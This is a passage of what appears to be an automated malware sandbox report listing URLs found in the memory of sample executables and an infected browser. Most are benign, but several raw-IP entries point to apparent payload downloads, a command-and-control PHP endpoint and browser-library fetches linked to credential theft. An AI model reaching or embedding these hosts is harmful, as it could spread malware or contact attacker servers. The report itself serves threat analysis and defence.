Source: d985563cac.exe, 00000010.00000003.2974238314.0000000001345000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2975683937.0000000001348000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe9
Source: d985563cac.exe, 0000001E.00000003.3135076485.0000000001471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeKm
Source: d985563cac.exe, 00000010.00000003.2973316188.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2997850953.0000000005C69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exer
Source: d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exez
Source: d985563cac.exe, 0000001E.00000003.3135076485.0000000001471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exezcm32=
Source: d985563cac.exe, 00000010.00000002.3065632992.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135076485.0000000001471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe1
Source: d985563cac.exe, 0000001E.00000003.3135825805.0000000001405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: d985563cac.exe, 00000010.00000003.2976247338.00000000012C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/off/def.exeCLSID
Source: file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2124046353.000000000059E000.00000004.00000020.00020000.00000000.sdmp, 25045de666.exe, 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, 25045de666.exe, 00000011.00000002.2744434040.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, 25045de666.exe, 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 25045de666.exe, 00000011.00000002.2744434040.00000000017F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/$
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllt
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll8
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllY
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll.
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllN
Source: file.exe, 00000000.00000002.2124046353.0000000000615000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: 25045de666.exe, 00000011.00000002.2744434040.00000000017F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/I
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/Y
Source: 25045de666.exe, 00000011.00000002.2744434040.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, 25045de666.exe, 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 25045de666.exe, 00000011.00000002.2744434040.00000000017F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 25045de666.exe, 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php5
Source: file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpa
Source: file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
Source: 25045de666.exe, 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206TZR
Source: file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206ones
Source: b24ae367e7.exe, 0000000F.00000003.3111193928.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3065452762.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/
Source: b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empw
Source: b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empy
Source: b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/dll/key
Source: b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.2785641384.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3065452762.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/download
Source: b24ae367e7.exe, 0000000F.00000003.3111193928.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3065452762.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/download)
Source: b24ae367e7.exe, 0000000F.00000003.3111193928.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3065452762.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/download?
Source: b24ae367e7.exe, 0000000F.00000003.3111193928.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3065452762.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/files/downloadM-5T(
Source: b24ae367e7.exe, 0000000F.00000003.3111193928.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/soft/download
Source: b24ae367e7.exe, 0000000F.00000003.3111193928.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://80.82.65.70/soft/downloadW-/T
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000021.00000002.3071561783.00000273A377D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSv
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: n4e23hz.exe, 0000000D.00000003.3116045057.00000000016E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: n4e23hz.exe, 0000000D.00000003.3116045057.0000000001711000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabN
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000021.00000002.3090059875.00000273A4919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2891656472.00000273AA086000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.3090059875.00000273A4941000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.3090059875.00000273A4941000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000021.00000002.3063668397.00000273A3126000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000021.00000002.3063668397.00000273A3126000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000021.00000002.3063668397.00000273A3126000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000021.00000002.3052932070.0000027397803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000021.00000002.3117423430.00000273A73A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000021.00000002.3154292539.00000273A79FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2836706918.00000273A79FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2905117361.00000273A88CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3013286202.00000273A8823000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2950431361.00000273A87C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2839131550.00000273A79FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2835971216.00000273A87DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2973921454.00000273AA070000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3090059875.00000273A4941000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2934343941.00000273A79FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2952152055.00000273A8820000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3131328035.00000273A7503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3162280011.00000273A7C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3090059875.00000273A4919000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3154292539.00000273A79F4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3010788734.00000273A79DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3162280011.00000273A7CCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2839131550.00000273A79EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2942576318.00000273A88DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000021.00000002.3071561783.00000273A377D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sextension/default-theme
Source: firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000021.00000002.3071561783.00000273A377D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sCan
Source: b24ae367e7.exe, 0000000F.00000003.3114063864.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111629929.0000000005624000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111049300.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111193928.0000000005681000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112458459.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112946723.0000000005A31000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111829869.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112298391.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3113083958.000000000595F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: file.exe, 00000000.00000002.2141301093.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3159160794.00000273A7A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2891656472.00000273AA070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 00000021.00000003.2976689780.00000273A9E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulLt
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/BrowserSearchTeleme
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/BrowserUsageTelemet
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/UrlbarProviderQuick
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/TelemetryTimesta
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: file.exe, 00000000.00000002.2137061294.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2126804428.00000000055D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000021.00000003.2827378604.00000273A755A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826867526.00000273A751F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827132194.00000273A753C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826664325.00000273A7300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/defaultPreventedByContent
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB156000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
